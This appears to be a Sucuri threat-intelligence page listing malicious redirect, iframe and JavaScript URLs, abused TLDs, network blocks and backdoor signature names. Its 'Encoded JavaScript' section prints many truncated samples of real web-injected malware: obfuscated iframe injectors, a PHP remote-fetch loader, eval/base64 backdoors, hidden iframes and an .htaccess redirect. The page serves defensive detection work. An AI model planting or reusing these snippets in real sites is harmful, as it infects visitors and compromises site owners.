Sucuri Global Malware View

Latest threats

.htaccess redirections (see more)

http://knowled.ru (193.104.153.9)
http://bamosa.ru (193.104.153.9)
http://bannortim-qimulta.ru/industry/index.php (95.163.67.194)
http://daliachu-uaroyalys.ru/industry/index.php (95.163.67.194)
http://daliachuuaroyalys.ru/industry/index.php (95.163.67.194)
http://uaroyalysdaliachu.ru/industry/index.php (95.163.67.194)
http://justing.ru/intuit/index.php
http://uaroyalys.ru/industry/index.php
http://froling.bee.pl/ (46.21.144.53)
http://daliachuqimaysa.ru/gluce/index.php (95.163.67.193)
http://qimaysadaliachu.ru/gluce/index.php (95.163.67.193)

Malicious iframes

http://br.brazil.usa.cc/index.php?showtopic=469925 (92.241.191.185)
http://ive49scor.rr.nu/pmg.php?dr=1 (194.28.114.103)
http://qwesfcbchfghtryre.bee.pl/iframe.php?id=201 (221.132.34.184)
http://zumobtr.ru/gate.php?f=1051800
http://q.gs/a238 (69.39.236.36)
http://wayr4way.in/in.cgi?20 (94.75.244.112)
http://analytic-google.com/track.php?id=11a2dc1f (200.46.204.8)
http://ciqtdxm.co.tv/?go=1 (174.129.242.247)
http://ikomnda1977.ru/doc/header.jpg
http://pokosa.com/tds/go.php?sid=1 (86.63.168.108)
http://le32r74bdx.co.uk/stat.php (80.84.51.4)

Malicious javascript

http://zumobtr.ru/gate.php?f=1079740
http://rpo66rat.rr.nu/nl.php?p=d (194.28.114.103)
http://mednesko.com (195.248.234.35)
http://bamosa.ru/tds/go.php?sid=5 (193.104.153.9)
http://www3.simple-vhantivir.com/?85kdhx3b=XKrUyKW (67.213.222.19)
http://bannortimqimulta.ru/industry/index.php (95.163.67.194)
http://www3.simple-vhantivir.com/?7kg5ubb=W%2BDQ (67.213.222.19)
http://www3.simple-vhantivir.com/?5symc4yfvp=Weji (67.213.222.19)
http://turnitupnow.net/?rnd= (184.168.36.1)
http://blogger.com.musikgratisan.com/stun.php (94.23.22.118)
http://www3.personal-soarmy.com/?2n38z4=VuOcnLds (67.213.222.19)

Scan your website

Is your web site compromised? Enter a URL and the Sucuri SiteCheck scanner will check the site for malware, blacklisting and other security issues.

Worst offenders TLDs

Small list of TLDs (top-level domains) being widely used for malware distribution.

.ru
.in
.no-ip.info
.cz.cc
.osa.pl
.co.tv
.co.be
.cx.cc
.co.cc

Top 10

Malware signatures

1. http://sucuri.net/malware../MW:IFRAME:HD202
2. http://sucuri.net/malware../MW:JS:444
3. http://sucuri.net/malware../MW:JS:152
4. http://sucuri.net/malware/..mwjs159
5. http://sucuri.net/malware/..mwiframehd203
6. http://sucuri.net/malware../MW:SPAM:SEO
7. http://sucuri.net/malware/..mwhta7
8. http://sucuri.net/malware/..mwjs1241
9. http://sucuri.net/malware/..mwjs67473
10. http://sucuri.net/malware/..mwjsanon7

Network blocks

1. 112.175.243 .0/24
2. 94.60.123 .0/24
3. 85.25.170 .0/24
4. 91.228.133 .0/24
5. 86.55.210 .0/24
6. 89.208.34 .0/24
7. 212.95.54 .0/24
8. 178.238.36 .0/24
9. 95.64.61 .0/24
10. 95.163.66 .0/24
11. 95.143.195 .0/24

Latest malware entries

Malware entry: MW:JS:JJ677

Malware entry: MW:IFRAME:ENC1560

Malware entry: MW:BLACKLISTED:35

Backdoor: PHP:PREG_REPLACE:EVAL

Backdoor: PHP:C99:045

Backdoor: PHP:R57:01

Backdoor: PHP:EVAL:GZINFLATE:B64

Backdoor: PHP:GENERIC:07

Backdoor: PHP:WEBSHELL:03

Backdoor: PHP:Filesman:02

Encoded JavaScript

Collection of the latest encoded JavaScript malware.

<script>b=new function(){return 2;};if(!+b)String.prototype.vqwfbeweb='h'+'arC';for(i in $='b4h3tbn34')if(i=='vqwfbeweb')m=$[i];try{new Object().wehweh...

<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host= $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

<script>var daAy;var uOc7aLS5Ftq=0;function c9rBB0(Pry64V5gifa,aMvpeP4d7,aMvpfP4d7,aMvpgP4d7,aMvpdP4d7,aMvpaP4d7,aMvpbP4d7,aMvpcP4d7){var izfcbuP=Pry64V5gifa;Pry64V5gifa+='3280';if(Pry64V5gifa==izfcbuP){for(var i;i<Pry64V5gifa.length;i++)...

</title><script src=http://infocenc.com.br/js/></script><title>

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZVUzElNmNTVGxEeNt1ZzkFcmJyJuUTNyZGJuciLxk2cwRCLiICKuVHdlJHJn4SNykmckRiLnsTKn4iInIiLnAkdX5Uc2dlTshEcMhHT8xFeMx2T4xjWkNTUwVGNdVzWvV1Wc9WT2wlbqZVX3lEclhTTKdWf8oEZzkVNdp2NwZGNVtVX8dmRPF3N1U2cVZDX4lVcdlWWKd2aZBnZtVFfNJ3N1U2cVZDX4lVcdlWWKd2aZBnZtVkVTpGTXB1JuITNyZGJuIyJi4SN1InZk4yJukyJuIyJi4yJ64GfNpjbWBVdId0T7NjVQJHVwV2aNZzWzQjSMhXTbd2MZBnZxpHfNFnasVWevp0ZthjWnBHPZ11MJpVX8FlSMxDRWB1JuITNyZGJuIyJi4SN1InZk4yJukyJuIyJi4yJAZ3VOFndX5EeNt1ZzkFcm5maWFlb0oET410WnNTWwZWc6xXT410WnNTWwZmbmZkT4xjWkNTUwVGNdVzWvV1Wc9WT2wlazcETn4iM1InZk4yJn4iInIiL1UjcmRiLn4SKiAkdX5Uc2dlT9pnRQZ3NwZGNVtVX8VlROxXV2YGbZZjZ4xkVPxWW1cGbExWZ8l1Sn9WT20kdmxWZ8l1Sn9WTL1UcqxWZ59mSn1GOadGc8kVXzkkWdxXUKxEPExGUn4iM1InZk4yJiciL1UjcmRiLn0TMpNHcksTKiciLyUTayZGJucSN3wVM1gHX2QTMcdzM4x1M1EDXzUDecNTMxwVN3gHXyETMchTN4xFN0EDXwMDecZjMxwFZ2gHXzQTMcJmN4x1N2EDX5YDecFTMxwVO2gHX3QTMcNTN4xlMzEDXiZDecFzNcdDN4xlM0EDX3cDecFjNcdTN4xVM0EDXmZDecVjMxw1N0gHXyMTMcZzN4xlNxEDX3UDecJzMxwlY2gHXxcDX2QDecZTMxwlMzgHX1ITMcJzM4x1M0EDX4YDecJTMxw1N0gHXxETMcVzN4xlMxEDX4UDecRDNxwFMzgHX2ITMcRmN4x1M0EDX3MDecNTNxwVO2gHXyQTMcZzN4xlMyEDX4UDecFDNxwVY2gHX1YDX3UDecRDNxwFZ2gHXyITMcNDN4xVMxEDXzcDecRjNcRmN4x1M0EDXxMDecJjMxwFO1gHXyMTMclzN4xlMyEDXzQDecNTMxwlM3gHXwcTMcdTN4xVMzEDXzMDecFzNcZTN4xVN0EDX4YDecJTMxwVZ2gHXzQTMchjN4xFN2EDX0UDecNTMxwVN3gHXyETMchTN4xFN0EDXwMDecZjMxwFZ2gHXzQTMcJmN4x1N0EDXzQDecRDNxwFM3gHXwcTMcdDN4x1M0EDXhdDecFzNcNmN4x1M0EDXwMDecZTMxwFO0gHXxETMclzM4xVMwEDX5YDecJDNxwVO3gHX2ITMcdiL1ITayZGJucyNzgHXzUTMcljN4xVMxEDX3MDecNTNxwVO3gHX1ETMcRzN4x1M1EDX5YDecJDNxwlN3gHX0UTMcdDN4xFN0EDXhZDecVjNcdTN4xFN0EDXkZDecJTMxwVO2gHX0ETMclj...

<!--scounter--><script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];...

<iframe src ="http://6tg56g5.osa.pl/main.php?page=f0fcf5853b543a9a" width="0" height="0">

<script>var _0x473c=["\x6E\x20\x71\x28\x29\x7B\x33\x3D\x30\x2E\x62\x28\x27\x64\x27\x29\x3B\x33\x2E\x63\x3D\x27\x70\x3A\x2F\x2F\x6A\x2E\x41...

<script>script>eval(String.fromCharCode(102,117,110,99,116...

<iframe src="http://%67%66%64%67%68%68%66%64%64%66%64%79%65%72%6E%76%64%67%68%6A.%63%65.%6D%73/main.php?page=4ecfff4e4234c726" width="1" height="1" frameborder="0" style="blblla;"></iframe>

<script>e=String.fromCharCode;if(typeof(hlwhk)==e(117,110,100,101,102,105,110,101,100)){hlwhk=1;c=document;n=c[e(99,114,101,97,116,101,69,108,101,109,101,110,116)](e(105,102,114,97,109,101));n[e(115,114,99)]=e(104,116,116,112,58,47,47,108,117,112,12...

<SCRIPT id="googleblogcontainer">var nf902ae4="";var e1060178120b5={dbf6eafb4f182:function(){var qb=String,vb=Array.prototype.slice.call(arguments).join(""),y8..

s=String[c+'r'+'omChar'+'C'+'o'+'d'+'e'](70,81,69,87,79,71,80,86,16,89,84,75,86,71,10,9,30,69,71,80,86,71,84,32,30,74,19,32,50..

if (document.getElementsByTagName('body')[0]){iframer();}else{d ocument. write("<iframe src='http://rebotstat.com/temp/stat.php'

document.write(unescape("%3C%53%43%52%49%50%54%20. .4E%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%3C%21%2D%2D%0D..

<iframe src="http://%68%67%61%6A%73%6B%66%67%6B%65%77%72%66%67 .. %6A%61%67%79%73%64%66%2E%63%65%2E%6D%73/main.php?page=ab77 .. 4927e8" width="1" height="1" frameborder="0"..

gab=15 ; gab-=2361; amp=8201; if(amp!=null){ran=2318;ran++;wry=0.001;wry++}wit=oxo('ExBWOB4XquJZ8l0h5MnMl37j2zZHx0eZStpY3trfFkYl2VtTRtAyX3UamBnEl0WGBROBg1aPdM8lub5UrAYaTSMWgTxNefSAywzUr5jiLhTYtUZUJEXWUrv1n4keCPVWiY4lqKJY8curQz1SEpLjiag9KXhjUvIOvBGZj6LjTKwhZMA3d7',7);hup=['due','dog'];sab=0.005;sab++;gee=oxo('sPDVSpgth9',4);fix={joy:0.016};auk=0.0057;if(auk==5728){sat=7554;sat-=6791;kue=11;if(kue!=0.006){pew=0.0107;pew--;tsk=0;tsk-=0.011}}bys=document;bys[gee](wit);function oxo(zo,zz){var mb,r,oj,os,ur,et,jn,g,ei,my,r,uw,ez,my,je,uy,ei,jn,jl,my,mb,up,ua;t=8;if(t!=15){m=0;m-=24}..

<?php error_reporting(0);unset($iz);$z['io']="HTTP_USER_AGENT";$z['wn']=$_SERVER[$z['io']];if(stristr($z['wn'],"MSIE")&&stristr($z['wn'],"Windows")){$iz['i']='122';$iz['f']='/home/beckiefarrant/knockoffdecor.com/wp-includes/js/jquery/jquery.out.js';$iz['r']='1800';$iz['h1']='alisoed.com';$iz['h2']='usalisa.ru';$iz['z']='';$iz['p1']="document.write(unescape(";$iz['t']=time();if(file_exists($iz['f'])){$iz['...

var s="";try{new asd[0]}catch(q){if(q)r=1;c=String;}if(r&&document.createTextNode)n=2;e=eval;m=[4.5*n,18/n,52.5*n,204/n,16*n,80/n,50*n,222/n,49.5*n,234/n,54.5*n,202/n,55*n,232/n,23*n,206/n,50.5*n,232/n,34.5*n,216/n,50.5*n,218/n,50.5*n,220/n,58*n,230/n,33*n,242/n,42*n,194/n,51.5*n,156/n,48.5*n,218/n,50.5*n,80/n,19.5*n,196/n,55.5*n,200/n,60.5*n,78/n,20.5*n,182/n,24*n,186/n,20.5*n,246/n,4.5*n,18/n,4.5*n,210/n,51*n,228/n,48.5*n,218/n,50.5*n,228/n,20*n,82/n,29.5*n,18/n,4.5*n,250/n,16*n,202/n,54*n,230/n,50.5*n,64/n,61.5*n,18/n,4.5*n,18/n,50*n,222/n,49.5*n,234/n,..

<script src="http://wholelifewholeworld.com/jslib/le.js"></script>

<script>e=String.fromCharCode;if(typeof(hlwhk)==e(117,110,100,101,102,105,110,101,100)){hlwhk=1;c=document;n=c[e(99,114,101,97,116,101,69,108,101,109,101,110,116)](e(105,102,114,97,109,101));n[e(115,114,99)]=e(104,116,116,112,58,47...

document.write("\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u002F\u006A...

<IfModule mod_rewrite.c>RewriteRule ^roy15/(.*)$ http://www.nbgbilgisayar.com/images/bar/index.html [R,L]RewriteRule ^aoy15/(.*?)-(.*?)-(.*?)-(.*?)/(.*)$ http://$1.$2.$4/$5 [R,L]</IfModule>

<style>#wypb {position:absolute;overflow:auto;height:0;width:0;}</style><font id="wypb"><a href="http://newyork-travel-guide.com/">newyork travel... (seo spam)

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|coom|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|hdfah|navigator|in|showthread|php|72241732'.split('|'),0,{}))

GLOBAL $wehaveitagain; { $preverrx=error_reporting(0); $wehaveitagain = 1; $mynetsxx = array( '84.235.77.0' => 24,..

var PluginDetect={version:"0.7.5",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string..

if(1){global $O10O1OO1O;$O10O1OO1O=create_function('$s,$k',"\44\163\75\165\162\154\144\145\143\157\144\145\50\44\163\51\73\40\44\164\141\162\147\145\164\75\47\47\73\44\123\75\47\41\43\44\45\46\50\51\52\53\54\55\56\57\60\61\62\63\64\65\66\67\70\71\72\73\74\75\76\134\77\100\101\102\103\104\105\106\107\110\111\112\113\114\115\116\117\120\121\122\123...

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\134w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\\x62'+e(c)+'\134b','g'),k[c]);return p;}('G\x20\141\x3DL\40J(\x29;\x61.\x79(a\x2E\101\x28\51\x2B\61\51\x3B\x44\50\127.\x58\x26\46\145.\x75\56\x31\63(\47\x5C\126\x5C\120\\\64\'\x29\x3D\x3D\55\x31\x29{e\56O(\'\\\x55\\\x6A\134\x53\134i\x5C\x52\x5C\162\x5C\x33\\\67\134\124\\\x6A\x5CN\x5Cb\134\x67\\\x34\134w\47\x2B0\x2E\66\x280\x2E\65(\x29\x2A\x32\532\51+\...

<script>var temp="",i,c=0,out="";var str="60!..105!102!114!97!..109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!97!108!105!97!115!46!106!106!98!119!111!114!107!115!46!99!111!109!47!97!110!97!108!121!116!105..

var  _0xdc8d=[ "\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74"..

var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\..

<iframe src="http://blood.of.cm/in.cgi?2" width="0" height="0"></iframe>

<script>if(window.document)aa=(Number+[].unshift).substr(0,4);aaa=([].sort+[].sort).substr(0,4);if(aa===aaa){ss='';s=String;12-function(){e=window['e'+'v'+'a'+'l'];}();t='w';}h=-2;n=["4.5w4.5w52.5w51w16w20w50w55.5w49.5w58.5w54.5w50.5w55w